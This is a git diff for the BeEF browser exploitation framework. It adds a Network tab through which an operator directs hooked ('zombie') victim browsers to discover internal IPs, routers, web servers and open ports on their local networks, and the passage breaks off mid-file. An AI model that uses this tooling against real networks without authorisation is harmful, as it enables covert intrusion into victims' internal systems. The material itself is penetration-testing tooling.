diff --git a/Gemfile b/Gemfile
index a873eeb9e..11297d839 100644
--- a/Gemfile
+++ b/Gemfile
@@ -41,6 +41,7 @@ gem "msfrpc-client" # Metasploit Integration extension
gem "rubyzip", ">= 1.0.0"
gem "rubydns", "0.7.0" # DNS extension
gem "geoip" # geolocation support
+gem "dm-serializer" # network extension
# For running unit tests
if ENV['BEEF_TEST']
diff --git a/core/main/handlers/browserdetails.rb b/core/main/handlers/browserdetails.rb
index 0541d3393..a91e2c937 100644
--- a/core/main/handlers/browserdetails.rb
+++ b/core/main/handlers/browserdetails.rb
@@ -177,6 +177,13 @@ module BeEF
unless proxy_server.nil?
BD.set(session_id, 'ProxyServer', "#{proxy_server}")
proxy_log_string += " [server: #{proxy_server}]"
+ if config.get("beef.extension.network.enable") == true
+ if proxy_server =~ /^([\d\.]+):([\d]+)$/
+ print_debug("Hooked browser [id:#{zombie.id}] is using a proxy [ip: #{$1}]")
+ r = BeEF::Core::Models::NetworkHost.new(:hooked_browser_id => session_id, :ip => $1, :type => 'Proxy', :cid => 'init')
+ r.save
+ end
+ end
end
BeEF::Core::Logger.instance.register('Zombie', "#{proxy_log_string}", "#{zombie.id}")
end
diff --git a/extensions/admin_ui/api/handler.rb b/extensions/admin_ui/api/handler.rb
index 49deb4074..5b827d099 100644
--- a/extensions/admin_ui/api/handler.rb
+++ b/extensions/admin_ui/api/handler.rb
@@ -33,7 +33,7 @@ module API
#NOTE: order counts! make sure you know what you're doing if you add files
esapi = %w(esapi/Class.create.js esapi/jquery-1.6.4.min.js esapi/jquery-encoder-0.1.0.js)
ux = %w(ui/common/beef_common.js ux/PagingStore.js ux/StatusBar.js ux/TabCloseMenu.js)
- panel = %w(ui/panel/common.js ui/panel/DistributedEngine.js ui/panel/PanelStatusBar.js ui/panel/tabs/ZombieTabDetails.js ui/panel/tabs/ZombieTabLogs.js ui/panel/tabs/ZombieTabCommands.js ui/panel/tabs/ZombieTabRider.js ui/panel/tabs/ZombieTabXssRays.js wterm/wterm.jquery.js ui/panel/tabs/ZombieTabIpec.js ui/panel/tabs/ZombieTabAutorun.js ui/panel/PanelViewer.js ui/panel/DataGrid.js ui/panel/MainPanel.js ui/panel/ZombieTab.js ui/panel/ZombieTabs.js ui/panel/zombiesTreeList.js ui/panel/ZombiesMgr.js ui/panel/Logout.js ui/panel/WelcomeTab.js ui/panel/ModuleSearching.js)
+ panel = %w(ui/panel/common.js ui/panel/DistributedEngine.js ui/panel/PanelStatusBar.js ui/panel/tabs/ZombieTabDetails.js ui/panel/tabs/ZombieTabLogs.js ui/panel/tabs/ZombieTabCommands.js ui/panel/tabs/ZombieTabRider.js ui/panel/tabs/ZombieTabXssRays.js wterm/wterm.jquery.js ui/panel/tabs/ZombieTabIpec.js ui/panel/tabs/ZombieTabAutorun.js ui/panel/PanelViewer.js ui/panel/DataGrid.js ui/panel/MainPanel.js ui/panel/ZombieTab.js ui/panel/ZombieTabs.js ui/panel/zombiesTreeList.js ui/panel/ZombiesMgr.js ui/panel/tabs/ZombieTabNetwork.js ui/panel/Logout.js ui/panel/WelcomeTab.js ui/panel/ModuleSearching.js)
global_js = esapi + ux + panel
diff --git a/extensions/admin_ui/media/css/base.css b/extensions/admin_ui/media/css/base.css
index 7c0c8c046..6c7f85b26 100644
--- a/extensions/admin_ui/media/css/base.css
+++ b/extensions/admin_ui/media/css/base.css
@@ -93,6 +93,70 @@
padding-top: 3px;
}
+/*
+ * Network Panel
+ ****************************************/
+.network-host-ctxMenu-config {
+ background-image: url(../images/icons/tools.png);
+ background-size: 16px 16px;
+ background-repeat: no-repeat;
+}
+
+.network-host-ctxMenu-host {
+ background-image: url(../images/icons/pc.png);
+ background-size: 16px 16px;
+ background-repeat: no-repeat;
+}
+
+.network-host-ctxMenu-network {
+ background-image: url(../images/icons/network.png);
+ background-size: 16px 16px;
+ background-repeat: no-repeat;
+}
+
+.network-host-ctxMenu-web {
+ background-image: url(../images/icons/web.png);
+ background-size: 16px 16px;
+ background-repeat: no-repeat;
+}
+
+.network-host-ctxMenu-adapter {
+ background-image: url(../images/icons/adapter.png);
+ background-size: 16px 16px;
+ background-repeat: no-repeat;
+}
+
+.network-host-ctxMenu-router {
+ background-image: url(../images/icons/router.png);
+ background-size: 16px 16px;
+ background-repeat: no-repeat;
+}
+
+.network-host-ctxMenu-fingerprint {
+ background-image: url(../images/icons/magnifier.png);
+ background-size: 16px 16px;
+ background-repeat: no-repeat;
+}
+
+.network-host-ctxMenu-cors {
+ background-image: url(../images/icons/cors.png);
+ background-size: 16px 16px;
+ background-repeat: no-repeat;
+}
+
+.network-host-ctxMenu-shellshock {
+ background-image: url(../images/icons/shellshock.png);
+ background-size: 16px 16px;
+ background-repeat: no-repeat;
+}
+
+.network-host-ctxMenu-php {
+ background-image: url(../images/icons/php.png);
+ background-size: 16px 16px;
+ background-repeat: no-repeat;
+}
+
+
/*
* Ext.beef.msg
****************************************/
diff --git a/extensions/admin_ui/media/images/icons/adapter.png b/extensions/admin_ui/media/images/icons/adapter.png
new file mode 100644
index 000000000..43b7a63ea
Binary files /dev/null and b/extensions/admin_ui/media/images/icons/adapter.png differ
diff --git a/extensions/admin_ui/media/images/icons/cors.png b/extensions/admin_ui/media/images/icons/cors.png
new file mode 100644
index 000000000..71127f9be
Binary files /dev/null and b/extensions/admin_ui/media/images/icons/cors.png differ
diff --git a/extensions/admin_ui/media/images/icons/magnifier.png b/extensions/admin_ui/media/images/icons/magnifier.png
new file mode 100644
index 000000000..985cc236f
Binary files /dev/null and b/extensions/admin_ui/media/images/icons/magnifier.png differ
diff --git a/extensions/admin_ui/media/images/icons/network.png b/extensions/admin_ui/media/images/icons/network.png
new file mode 100644
index 000000000..132491d14
Binary files /dev/null and b/extensions/admin_ui/media/images/icons/network.png differ
diff --git a/extensions/admin_ui/media/images/icons/pc.png b/extensions/admin_ui/media/images/icons/pc.png
index d8f38aca7..8d207a8d0 100644
Binary files a/extensions/admin_ui/media/images/icons/pc.png and b/extensions/admin_ui/media/images/icons/pc.png differ
diff --git a/extensions/admin_ui/media/images/icons/php.png b/extensions/admin_ui/media/images/icons/php.png
new file mode 100644
index 000000000..e1830d000
Binary files /dev/null and b/extensions/admin_ui/media/images/icons/php.png differ
diff --git a/extensions/admin_ui/media/images/icons/router.png b/extensions/admin_ui/media/images/icons/router.png
new file mode 100644
index 000000000..09ba9cb92
Binary files /dev/null and b/extensions/admin_ui/media/images/icons/router.png differ
diff --git a/extensions/admin_ui/media/images/icons/shellshock.png b/extensions/admin_ui/media/images/icons/shellshock.png
new file mode 100644
index 000000000..6f6347c06
Binary files /dev/null and b/extensions/admin_ui/media/images/icons/shellshock.png differ
diff --git a/extensions/admin_ui/media/images/icons/tools.png b/extensions/admin_ui/media/images/icons/tools.png
new file mode 100644
index 000000000..2a1e72744
Binary files /dev/null and b/extensions/admin_ui/media/images/icons/tools.png differ
diff --git a/extensions/admin_ui/media/images/icons/web.png b/extensions/admin_ui/media/images/icons/web.png
new file mode 100644
index 000000000..2db402969
Binary files /dev/null and b/extensions/admin_ui/media/images/icons/web.png differ
diff --git a/extensions/admin_ui/media/javascript/ui/panel/WelcomeTab.js b/extensions/admin_ui/media/javascript/ui/panel/WelcomeTab.js
index 932811ca0..0485255ff 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/WelcomeTab.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/WelcomeTab.js
@@ -35,7 +35,8 @@ WelcomeTab = function() {
The command module does not work against this target
\
XssRays: The XssRays tab allows the user to check if links, forms and URI path of the page (where the browser is hooked) is vulnerable to XSS. \
Rider: The Rider tab allows you to submit arbitrary HTTP requests on behalf of the hooked browser. \
- Each request sent by the Rider is recorded in the History panel. Click a history item to view the HTTP headers and HTML source of the HTTP response.
\
+ Each request sent by the Rider is recorded in the History panel. Click a history item to view the HTTP headers and HTML source of the HTTP response. \
+ Network: The Network tab allows you to interact with hosts on the local network(s) of the hooked browser.
\
You can also right-click a hooked browser to open a context-menu with additional functionality:
\
\
- Tunneling Proxy: The Proxy allows you to use a hooked browser as a proxy. Simply right-click a browser from the Hooked Browsers tree to the left and select \"Use as Proxy\". \
diff --git a/extensions/admin_ui/media/javascript/ui/panel/ZombieTab.js b/extensions/admin_ui/media/javascript/ui/panel/ZombieTab.js
index 06fdc03e4..9147e301d 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/ZombieTab.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/ZombieTab.js
@@ -9,27 +9,29 @@ ZombieTab = function(zombie) {
log_tab = new ZombieTab_LogTab(zombie);
commands_tab = new ZombieTab_Commands(zombie);
requester_tab = new ZombieTab_Requester(zombie);
- xssrays_tab = new ZombieTab_XssRaysTab(zombie);
- ipec_tab = new ZombieTab_IpecTab(zombie);
- autorun_tab = new ZombieTab_Autorun(zombie);
+ xssrays_tab = new ZombieTab_XssRaysTab(zombie);
+ ipec_tab = new ZombieTab_IpecTab(zombie);
+ autorun_tab = new ZombieTab_Autorun(zombie);
+ network_tab = new ZombieTab_Network(zombie);
+
ZombieTab.superclass.constructor.call(this, {
- id:"current-browser",
+ id:"current-browser",
activeTab: 0,
loadMask: {msg:'Loading browser...'},
- title: "Current Browser",
+ title: "Current Browser",
autoScroll: true,
closable: false,
viewConfig: {
forceFit: true,
type: 'fit'
},
- items:[main_tab, log_tab, commands_tab, requester_tab, xssrays_tab, ipec_tab, autorun_tab],
- listeners:{
- afterrender:function(component){
- // Hide auto-run tab
- component.hideTabStripItem(autorun_tab);
- }
- }
+ items:[main_tab, log_tab, commands_tab, requester_tab, xssrays_tab, ipec_tab, autorun_tab, network_tab],
+ listeners:{
+ afterrender:function(component){
+ // Hide auto-run tab
+ component.hideTabStripItem(autorun_tab);
+ }
+ }
});
};
diff --git a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabNetwork.js b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabNetwork.js
new file mode 100644
index 000000000..dfd9e4bf3
--- /dev/null
+++ b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabNetwork.js
@@ -0,0 +1,822 @@
+//
+// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+/*
+ * The Network tab panel for the selected zombie browser.
+ * Loaded in /ui/panel/index.html
+ */
+ZombieTab_Network = function(zombie) {
+
+ // The status bar.
+ var commands_statusbar = new Beef_StatusBar('network-bbar-zombie-'+zombie.session);
+ // RESTful API token
+ var token = beefwui.get_rest_token();
+
+ // get module ID from name
+ var get_module_id = function(name){
+ var id = "";
+ $jwterm.ajax({
+ type: 'GET',
+ url: "/api/modules/search/" + name + "?token=" + token,
+ async: false,
+ processData: false,
+ success: function(data){
+ id = data.id;
+ },
+ error: function(){
+ commands_statusbar.update_fail("Error getting module id for '"+mod_name+"'");
+ }
+ });
+ return id;
+ }
+
+ /*
+ * The panel that displays all identified network services grouped by host
+ ********************************************/
+ var hosts_panel_store = new Ext.ux.data.PagingJsonStore({
+ storeId: 'network-host-store-zombie-'+zombie.session,
+ proxy: new Ext.data.HttpProxy({
+ url: '/api/network/hosts/'+zombie.session+'?token='+token,
+ method: 'GET'
+ }),
+ remoteSort: false,
+ autoDestroy: true,
+ autoLoad: false,
+ root: 'hosts',
+ fields: ['id', 'ip', 'hostname', 'type', 'os', 'mac'],
+ sortInfo: {field: 'ip', direction: 'ASC'}
+ });
+
+ var req_pagesize = 50;
+
+ var hosts_panel_bbar = new Ext.PagingToolbar({
+ pageSize: req_pagesize,
+ store: hosts_panel_store,
+ displayInfo: true,
+ displayMsg: 'Displaying network hosts {0} - {1} of {2}',
+ emptyMsg: 'No hosts to display'
+ });
+
+ var hosts_panel_grid = new Ext.grid.GridPanel({
+ id: 'network-host-grid-zombie-'+zombie.session,
+ store: hosts_panel_store,
+ bbar: hosts_panel_bbar,
+ border: false,
+ loadMask: {msg:'Loading network hosts...'},
+
+ viewConfig: {
+ forceFit: true
+ },
+
+ view: new Ext.grid.GridView({
+ forceFit: true,
+ emptyText: "No hosts",
+ enableRowBody:true
+ }),
+
+ columns: [
+ {header: 'Id', width: 5, sortable: true, dataIndex: 'id', hidden:true},
+ {header: 'IP Address', width: 10, sortable: true, dataIndex: 'ip', renderer: function(value){return $jEncoder.encoder.encodeForHTML(value)}},
+ {header: 'Host Name', width: 10, sortable: true, dataIndex: 'hostname', renderer: function(value){return $jEncoder.encoder.encodeForHTML(value)}},
+ {header: 'Type', width: 20, sortable: true, dataIndex: 'type', renderer: function(value){return $jEncoder.encoder.encodeForHTML(value)}},
+ {header: 'Operating System', width: 10, sortable: true, dataIndex: 'os', renderer: function(value){return $jEncoder.encoder.encodeForHTML(value)}},
+ {header: 'MAC Address', width: 10, sortable: true, dataIndex: 'mac', renderer: function(value){return $jEncoder.encoder.encodeForHTML(value)}}
+ ],
+
+ listeners: {
+ rowclick: function(grid, rowIndex) {
+ var r = grid.getStore().getAt(rowIndex).data;
+ },
+ contextmenu: function(e, element, options) {
+ e.preventDefault();
+ },
+ containercontextmenu: function(view, e) {
+ e.preventDefault();
+ var emptygrid_menu = new Ext.menu.Menu({
+ items: [
+ {
+ text: 'Get Internal IP Address',
+ iconCls: 'network-host-ctxMenu-adapter',
+ handler: function() {
+ var mod_id = get_module_id("get_internal_ip_webrtc");
+ commands_statusbar.update_sending('Identifying zombie network adapters ...');
+ $jwterm.ajax({
+ contentType: 'application/json',
+ data: JSON.stringify({}),
+ dataType: 'json',
+ type: 'POST',
+ url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
+ async: false,
+ processData: false,
+ success: function(data){
+ commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
+ },
+ error: function(){
+ commands_statusbar.update_fail('Error sending command');
+ }
+ });
+ }
+ },{
+ text: 'Identify LAN Subnets',
+ iconCls: 'network-host-ctxMenu-network',
+ handler: function() {
+ var mod_id = get_module_id("identify_lan_subnets");
+ commands_statusbar.update_sending('Identifying zombie LAN subnets ...');
+ $jwterm.ajax({
+ contentType: 'application/json',
+ data: JSON.stringify({}),
+ dataType: 'json',
+ type: 'POST',
+ url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
+ async: false,
+ processData: false,
+ success: function(data){
+ commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
+ },
+ error: function(){
+ commands_statusbar.update_fail('Error sending command');
+ }
+ });
+ }
+ },{
+ text: 'Discover Routers',
+ iconCls: 'network-host-ctxMenu-router',
+ handler: function() {
+ var mod_id = get_module_id("fingerprint_routers");
+ commands_statusbar.update_sending('Scanning commonly used local area network IP addresses for routers ...');
+ $jwterm.ajax({
+ contentType: 'application/json',
+ data: JSON.stringify({}),
+ dataType: 'json',
+ type: 'POST',
+ url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
+ async: false,
+ processData: false,
+ success: function(data){
+ commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
+ },
+ error: function(){
+ commands_statusbar.update_fail('Error sending command');
+ }
+ });
+ }
+ },{
+ text: 'Discover Web Servers',
+ iconCls: 'network-host-ctxMenu-web',
+ menu: {
+ xtype: 'menu',
+ items: [{
+ text: 'Common LAN IPs',
+ iconCls: 'network-host-ctxMenu-network',
+ handler: function() {
+ var mod_name = "get_http_servers";
+ var mod_id = get_module_id(mod_name);
+ commands_statusbar.update_sending('Favicon scanning commonly used local area network IP addresses for web servers...');
+ $jwterm.ajax({
+ contentType: 'application/json',
+ data: JSON.stringify({"ipRange":"common"}),
+ dataType: 'json',
+ type: 'POST',
+ url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
+ async: false,
+ processData: false,
+ success: function(data){
+ commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
+ },
+ error: function(){
+ commands_statusbar.update_fail('Error executing module ' + mod_name + ' [id: ' + mod_id + ']');
+ }
+ });
+ }
+ },{
+ text: 'Specify IP Range',
+ iconCls: 'network-host-ctxMenu-config',
+ handler: function() {
+ var ip_range = prompt("Enter IP range to scan:", '192.168.1.1-192.168.1.254');
+ if (!ip_range) {
+ commands_statusbar.update_fail('Cancelled');
+ return;
+ }
+ var mod_name = "get_http_servers";
+ var mod_id = get_module_id(mod_name);
+ commands_statusbar.update_sending('Favicon scanning ' + ip_range + ' for web servers...');
+ $jwterm.ajax({
+ contentType: 'application/json',
+ data: JSON.stringify({"ipRange":ip_range}),
+ dataType: 'json',
+ type: 'POST',
+ url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
+ async: false,
+ processData: false,
+ success: function(data){
+ commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
+ },
+ error: function(){
+ commands_statusbar.update_fail('Error executing module ' + mod_name + ' [id: ' + mod_id + ']');
+ }
+ });
+ }
+ }]
+ }
+ },{
+ text: 'Fingerprint HTTP',
+ iconCls: 'network-host-ctxMenu-fingerprint',
+ menu: {
+ xtype: 'menu',
+ items: [{
+ text: 'Common LAN IPs',
+ iconCls: 'network-host-ctxMenu-network',
+ handler: function() {
+ var mod_name = "internal_network_fingerprinting";
+ var mod_id = get_module_id(mod_name);
+ commands_statusbar.update_sending('Fingerprinting commonly used local area network IP addresses...');
+ $jwterm.ajax({
+ contentType: 'application/json',
+ data: JSON.stringify({"ipRange":"common"}),
+ dataType: 'json',
+ type: 'POST',
+ url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
+ async: false,
+ processData: false,
+ success: function(data){
+ commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
+ },
+ error: function(){
+ commands_statusbar.update_fail('Error executing module ' + mod_name + ' [id: ' + mod_id + ']');
+ }
+ });
+ }
+ },{
+ text: 'Specify IP Range',
+ iconCls: 'network-host-ctxMenu-config',
+ handler: function() {
+ var ip_range = prompt("Enter IP range to scan:", '192.168.1.1-192.168.1.254');
+ if (!ip_range) {
+ commands_statusbar.update_fail('Cancelled');
+ return;
+ }
+ var mod_name = "internal_network_fingerprinting";
+ var mod_id = get_module_id(mod_name);
+ commands_statusbar.update_sending('Fingerprinting ' + ip_range + '...');
+ $jwterm.ajax({
+ contentType: 'application/json',
+ data: JSON.stringify({"ipRange":ip_range}),
+ dataType: 'json',
+ type: 'POST',
+ url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
+ async: false,
+ processData: false,
+ success: function(data){
+ commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
+ },
+ error: function(){
+ commands_statusbar.update_fail('Error executing module ' + mod_name + ' [id: ' + mod_id + ']');
+ }
+ });
+ }
+ }]
+ }
+ },{
+ text: 'CORS Scan',
+ iconCls: 'network-host-ctxMenu-cors',
+ menu: {
+ xtype: 'menu',
+ items: [{
+ text: 'Common LAN IPs',
+ iconCls: 'network-host-ctxMenu-network',
+ handler: function() {
+ var mod_name = "cross_origin_scanner";
+ var mod_id = get_module_id(mod_name);
+ commands_statusbar.update_sending('CORS scanning commonly used local area network IP addresses...');
+ $jwterm.ajax({
+ contentType: 'application/json',
+ data: JSON.stringify({"ipRange":"common"}),
+ dataType: 'json',
+ type: 'POST',
+ url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
+ async: false,
+ processData: false,
+ success: function(data){
+ commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
+ },
+ error: function(){
+ commands_statusbar.update_fail('Error executing module ' + mod_name + ' [id: ' + mod_id + ']');
+ }
+ });
+ }
+ },{
+ text: 'Specify IP Range',
+ iconCls: 'network-host-ctxMenu-config',
+ handler: function() {
+ var ip_range = prompt("Enter IP range to scan:", '192.168.1.1-192.168.1.254');
+ if (!ip_range) {
+ commands_statusbar.update_fail('Cancelled');
+ return;
+ }
+ var mod_name = "cross_origin_scanner";
+ var mod_id = get_module_id(mod_name);
+ commands_statusbar.update_sending('CORS scanning ' + ip_range + '...');
+ $jwterm.ajax({
+ contentType: 'application/json',
+ data: JSON.stringify({"ipRange":ip_range}),
+ dataType: 'json',
+ type: 'POST',
+ url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
+ async: false,
+ processData: false,
+ success: function(data){
+ commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
+ },
+ error: function(){
+ commands_statusbar.update_fail('Error executing module ' + mod_name + ' [id: ' + mod_id + ']');
+ }
+ });
+ }
+ }]
+ }
+ }]
+ });
+ emptygrid_menu.showAt(e.getXY());
+ },
+ rowcontextmenu: function(grid, rowIndex, e) {
+ e.preventDefault();
+ grid.getSelectionModel().selectRow(rowIndex);
+ if (!!grid.rowCtxMenu) {
+ grid.rowCtxMenu.destroy();
+ }
+ var record = grid.selModel.getSelected();
+ var ip = record.get('ip');
+ var class_c = ip.split(".")[0]+"."+ip.split(".")[1]+"."+ip.split(".")[2];
+ var ip_range = class_c+'.1-'+class_c+'.255';
+ grid.rowCtxMenu = new Ext.menu.Menu({
+ items: [
+ {
+ text: 'Discover Web Servers',
+ iconCls: 'network-host-ctxMenu-web',
+ menu: {
+ xtype: 'menu',
+ items: [{
+ text: 'Host ('+ip+')',
+ iconCls: 'network-host-ctxMenu-host',
+ handler: function() {
+ var mod_id = get_module_id("get_http_servers");
+ commands_statusbar.update_sending('Favicon scanning ' + ip + ' for HTTP servers...');
+ $jwterm.ajax({
+ contentType: 'application/json',
+ data: JSON.stringify({"ipRange":ip+'-'+ip}),
+ dataType: 'json',
+ type: 'POST',
+ url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
+ async: false,
+ processData: false,
+ success: function(data){
+ commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
+ },
+ error: function(){
+ commands_statusbar.update_fail('Error sending command');
+ }
+ });
+ }
+ },{
+ text: 'Network ('+class_c+'.0/24)',
+ iconCls: 'network-host-ctxMenu-network',
+ handler: function() {
+ var mod_id = get_module_id("get_http_servers");
+ commands_statusbar.update_sending('Favicon scanning ' + ip_range + ' for HTTP servers...');
+ $jwterm.ajax({
+ contentType: 'application/json',
+ data: JSON.stringify({"ipRange":ip_range}),
+ dataType: 'json',
+ type: 'POST',
+ url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
+ async: false,
+ processData: false,
+ success: function(data){
+ commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
+ },
+ error: function(){
+ commands_statusbar.update_fail('Error sending command');
+ }
+ });
+ }
+ }]
+ }
+ },{
+ text: 'Fingerprint HTTP',
+ iconCls: 'network-host-ctxMenu-fingerprint',
+ menu: {
+ xtype: 'menu',
+ items: [{
+ text: 'Host ('+ip+')',
+ iconCls: 'network-host-ctxMenu-host',
+ handler: function() {
+ var mod_id = get_module_id("internal_network_fingerprinting");
+ commands_statusbar.update_sending('Fingerprinting ' + ip + '...');
+ $jwterm.ajax({
+ contentType: 'application/json',
+ data: JSON.stringify({"ipRange":ip+'-'+ip}),
+ dataType: 'json',
+ type: 'POST',
+ url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
+ async: false,
+ processData: false,
+ success: function(data){
+ commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
+ },
+ error: function(){
+ commands_statusbar.update_fail('Error sending command');
+ }
+ });
+ }
+ },{
+ text: 'Network ('+class_c+'.0/24)',
+ iconCls: 'network-host-ctxMenu-network',
+ handler: function() {
+ var mod_id = get_module_id("internal_network_fingerprinting");
+ commands_statusbar.update_sending('Fingerprinting ' + ip_range + '...');
+ $jwterm.ajax({
+ contentType: 'application/json',
+ data: JSON.stringify({"ipRange":ip_range}),
+ dataType: 'json',
+ type: 'POST',
+ url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
+ async: false,
+ processData: false,
+ success: function(data){
+ commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
+ },
+ error: function(){
+ commands_statusbar.update_fail('Error sending command');
+ }
+ });
+ }
+ }]
+ }
+ },{
+ text: 'CORS Scan',
+ iconCls: 'network-host-ctxMenu-cors',
+ menu: {
+ xtype: 'menu',
+ items: [{
+ text: 'Host ('+ip+')',
+ iconCls: 'network-host-ctxMenu-host',
+ handler: function() {
+ var mod_id = get_module_id("cross_origin_scanner");
+ commands_statusbar.update_sending('CORS scanning ' + ip + '...');
+ $jwterm.ajax({
+ contentType: 'application/json',
+ data: JSON.stringify({"ipRange":ip+'-'+ip}),
+ dataType: 'json',
+ type: 'POST',
+ url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
+ async: false,
+ processData: false,
+ success: function(data){
+ commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
+ },
+ error: function(){
+ commands_statusbar.update_fail('Error sending command');
+ }
+ });
+ }
+ },{
+ text: 'Network ('+class_c+'.0/24)',
+ iconCls: 'network-host-ctxMenu-network',
+ handler: function() {
+ var mod_id = get_module_id("cross_origin_scanner");
+ commands_statusbar.update_sending('CORS scanning ' + ip_range + '...');
+ $jwterm.ajax({
+ contentType: 'application/json',
+ data: JSON.stringify({"ipRange":ip_range}),
+ dataType: 'json',
+ type: 'POST',
+ url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
+ async: false,
+ processData: false,
+ success: function(data){
+ commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
+ },
+ error: function(){
+ commands_statusbar.update_fail('Error sending command');
+ }
+ });
+ }
+ }]
+ }
+ },{
+ text: 'Port Scan',
+ iconCls: 'network-host-ctxMenu-network',
+ menu: {
+ xtype: 'menu',
+ items: [{
+ text: 'Common Ports',
+ iconCls: 'network-host-ctxMenu-host',
+ handler: function() {
+ var mod_id = get_module_id("port_scanner");
+ var ports = '21,22,23,25,80,81,443,445,1080,8080,8081,8090,8443,3000,3128,3389,3306,5432,6379,10000,10443';
+ commands_statusbar.update_sending('Port scanning ' + ip + '...');
+ $jwterm.ajax({
+ contentType: 'application/json',
+ data: JSON.stringify({"ipHost":ip,"ports":ports}),
+ dataType: 'json',
+ type: 'POST',
+ url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
+ async: false,
+ processData: false,
+ success: function(data){
+ commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
+ },
+ error: function(){
+ commands_statusbar.update_fail('Error sending command');
+ }
+ });
+ }
+ },{
+ text: 'Specify Ports',
+ iconCls: 'network-host-ctxMenu-config',
+ handler: function() {
+ var mod_id = get_module_id("port_scanner");
+ var ports = prompt("Enter ports to scan:", '1,5,7,9,15,20,21,22,23,25,26,29,33,37,42,43,53,67,68,69,70,76,79,80,88,90,98,101,106,109,110,111,113,114,115,118,119,123,129,132,133,135,136,137,138,139,143,144,156,158,161,162,168,174,177,194,197,209,213,217,219,220,223,264,315,316,346,353,389,413,414,415,416,440,443,444,445,453,454,456,457,458,462,464,465,466,480,486,497,500,501,516,518,522,523,524,525,526,533,535,538,540,541,542,543,544,545,546,547,556,557,560,561,563,564,625,626,631,636,637,660,664,666,683,740,741,742,744,747,748,749,750,751,752,753,754,758,760,761,762,763,764,765,767,771,773,774,775,776,780,781,782,783,786,787,799,800,801,808,871,873,888,898,901,953,989,990,992,993,994,995,996,997,998,999,1000,1002,1008,1023,1024,1080,8080,8443,8050,3306,5432,1521,1433,3389,10088');
+ if (!ports) {
+ commands_statusbar.update_fail('Cancelled');
+ return;
+ }
+ commands_statusbar.update_sending('Port scanning ' + ip + '...');
+ $jwterm.ajax({
+ contentType: 'application/json',
+ data: JSON.stringify({"ipHost":ip,"ports":ports}),
+ dataType: 'json',
+ type: 'POST',
+ url: "/api/modules/" + zombie.session + "/" + mod_id + "?token=" + token,
+ async: false,
+ processData: false,
+ success: function(data){
+ commands_statusbar.update_sent("Command [id: " + data.command_id + "] sent successfully");
+ },
+ error: function(){
+ commands_statusbar.update_fail('Error sending command');
+ }
+ });
+ }
+ }]
+ }
+ }]
+ });
+ grid.rowCtxMenu.showAt(e.getXY());
+ },
+ afterrender: function(datagrid) {
+ datagrid.store.reload({ params: {nonce: Ext.get ("nonce").dom.value} });
+ }
+
+ }
+ });
+
+ var hosts_panel = new Ext.Panel({
+ id: 'network-host-panel-zombie-'+zombie.session,
+ title: 'Hosts',
+ items:[hosts_panel_grid],
+ layout: 'fit',
+ listeners: {
+ activate: function(hosts_panel) {
+ hosts_panel.items.items[0].store.reload({ params: {nonce: Ext.get ("nonce").dom.value} });
+ }
+ }
+ });
+
+ /*
+ * The panel that displays all identified network services sorted by host
+ ********************************************/
+ var services_panel_store = new Ext.ux.data.PagingJsonStore({
+ storeId: 'network-services-store-zombie-'+zombie.session,
+ proxy: new Ext.data.HttpProxy({
+ url: '/api/network/services/'+zombie.session+'?token='+token,
+ method: 'GET'
+ }),
+ remoteSort: false,
+ autoDestroy: true,
+ autoLoad: false,
+ root: 'services',
+ fields: ['id', 'proto', 'ip', 'port', 'type'],
+ sortInfo: {field: 'ip', direction: 'ASC'}
+ });
+
+ var req_pagesize = 50;
+
+ var services_panel_bbar = new Ext.PagingToolbar({
+ pageSize: req_pagesize,
+ store: services_panel_store,
+ displayInfo: true,
+ displayMsg: 'Displaying network services {0} - {1} of {2}',
+ emptyMsg: 'No services to display'
+ });
+
+ var services_panel_grid = new Ext.grid.GridPanel({
+ id: 'network-services-grid-zombie-'+zombie.session,
+ store: services_panel_store,
+ bbar: services_panel_bbar,
+ border: false,
+ loadMask: {msg:'Loading network services...'},
+
+ viewConfig: {
+ forceFit: true
+ },
+
+ view: new Ext.grid.GridView({
+ forceFit: true,
+ emptyText: "No services",
+ enableRowBody:true
+ }),
+
+ columns: [
+ {header: 'Id', width: 5, sortable: true, dataIndex: 'id', hidden:true},
